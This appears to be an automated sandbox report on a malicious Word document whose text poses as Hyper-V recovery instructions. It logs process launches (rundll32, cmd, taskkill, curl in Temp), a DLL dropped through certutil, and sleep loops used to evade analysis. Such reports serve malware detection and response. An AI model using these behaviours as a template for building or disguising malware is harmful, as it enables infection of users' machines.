Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe

Code function: GetAdaptersInfo,_Smanip,

16_2_00007FFD92BEE600

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\certutil.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\curl.exe	API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exe	API coverage: 9.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\rundll32.exe TID: 6552

Thread sleep count: 82 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,	16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,	16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	16_2_00007FFD92CCDD10

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C95E80 GetSystemInfo,

16_2_00007FFD92C95E80

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" 